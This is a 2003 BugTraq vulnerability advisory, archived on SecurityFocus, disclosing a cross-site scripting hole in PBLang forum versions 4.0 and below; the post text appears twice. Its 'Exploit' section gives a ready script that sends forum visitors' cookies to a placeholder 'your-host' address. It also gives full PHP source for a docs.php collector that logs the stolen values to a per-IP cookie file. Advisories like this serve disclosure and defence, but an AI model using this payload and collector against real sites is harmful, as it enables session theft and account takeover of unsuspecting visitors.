BugTraq
Back to list
|
Post reply
PBLang Forum XSS Vul
Jul 25 2003 12:54PM
Quan Van Truong Bui (quan_vu_208cn yahoo com)
PBLang is a web forum written by PHP language. A security vulnerability in
the product allows posting of HTML code and JavaScript into existing web
pages thus causing it to be executed on the client end (a Cross-Site
Scripting vuln).
|--------------------------------------------|
Vulnerable systems: PBLang forum
Version: 4.0 or lower
Website: http://pblang.drmartinus.de/
Problem: Cross Site Scripting (XSS)
|--------------------------------------------|
If someone inserts <script>`anyscript`</script> instead of the post?s
content, the JavaScript code is executed by Internet Explorer or some
other web browsers. This allows stealing of cookie data and other
interesting things?
Exploit:
Inserting a new topic (or reply) with the following script, it will send
visitor's cookies to your host. The output is saved to http://your-
host/cookie.txt
*-----------------------------------------------------------------------
---
-------------------
<script>window.open("http://your-host/docs.php?docs="+escape
(document.cookie), "subwindows", "height=100,width=486")</script>
------------------------------------------------------------------------
---
------------------*
Or insert every scripts ? Java and HTML (ex: javascript:history.go(-1),
window.write(?Hello world?), javascript:alert(?Hi!!!?)? )
* Code of docs.php:*
*-------------------------------------------------docs.php--------------
---
-------------------------------
<?php
//Copyright by W_Hat (www.pcworldvn.com)
define ("LINE", "\r\n");
define ("HTML_LINE", "<br>");
function getvars($arr, $title)
{
$res = "";
$len = count($arr);
if ($len>0)
{
if (strlen($title)>0)
{
print("[--------$title--------]" . HTML_LINE);
$res .= "[--------$title--------]" . LINE;
}
foreach ($arr as $key => $value)
{
print("[$key]" . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= "[$key]" . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date("Y-m-d H:i:s");
// init
$myData = "[-----$now-----]" . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, "");
// file
$file = $REMOTE_ADDR . "cookie.txt";
$mode = "r+";
if (!file_exists($file))
$mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>
-------------------------------------------------docs.php---------------
---
------------------------------*
Name: Quan Van Truong
E-Mail: quan_vu_208cn (at) yahoo (dot) com [email concealed]
Occupation: Bug Hunter
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
PBLang is a web forum written by PHP language. A security vulnerability in
the product allows posting of HTML code and JavaScript into existing web
pages thus causing it to be executed on the client end (a Cross-Site
Scripting vuln).
|--------------------------------------------|
Vulnerable systems: PBLang forum
Version: 4.0 or lower
Website: http://pblang.drmartinus.de/
Problem: Cross Site Scripting (XSS)
|--------------------------------------------|
If someone inserts <script>`anyscript`</script> instead of the post?s
content, the JavaScript code is executed by Internet Explorer or some
other web browsers. This allows stealing of cookie data and other
interesting things?
Exploit:
Inserting a new topic (or reply) with the following script, it will send
visitor's cookies to your host. The output is saved to http://your-
host/cookie.txt
*-----------------------------------------------------------------------
---
-------------------
<script>window.open("http://your-host/docs.php?docs="+escape
(document.cookie), "subwindows", "height=100,width=486")</script>
------------------------------------------------------------------------
---
------------------*
Or insert every scripts ? Java and HTML (ex: javascript:history.go(-1),
window.write(?Hello world?), javascript:alert(?Hi!!!?)? )
* Code of docs.php:*
*-------------------------------------------------docs.php--------------
---
-------------------------------
<?php
//Copyright by W_Hat (www.pcworldvn.com)
define ("LINE", "\r\n");
define ("HTML_LINE", "<br>");
function getvars($arr, $title)
{
$res = "";
$len = count($arr);
if ($len>0)
{
if (strlen($title)>0)
{
print("[--------$title--------]" . HTML_LINE);
$res .= "[--------$title--------]" . LINE;
}
foreach ($arr as $key => $value)
{
print("[$key]" . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= "[$key]" . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date("Y-m-d H:i:s");
// init
$myData = "[-----$now-----]" . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, "");
// file
$file = $REMOTE_ADDR . "cookie.txt";
$mode = "r+";
if (!file_exists($file))
$mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>
-------------------------------------------------docs.php---------------
---
------------------------------*
Name: Quan Van Truong
E-Mail: quan_vu_208cn (at) yahoo (dot) com [email concealed]
Occupation: Bug Hunter
[ reply ]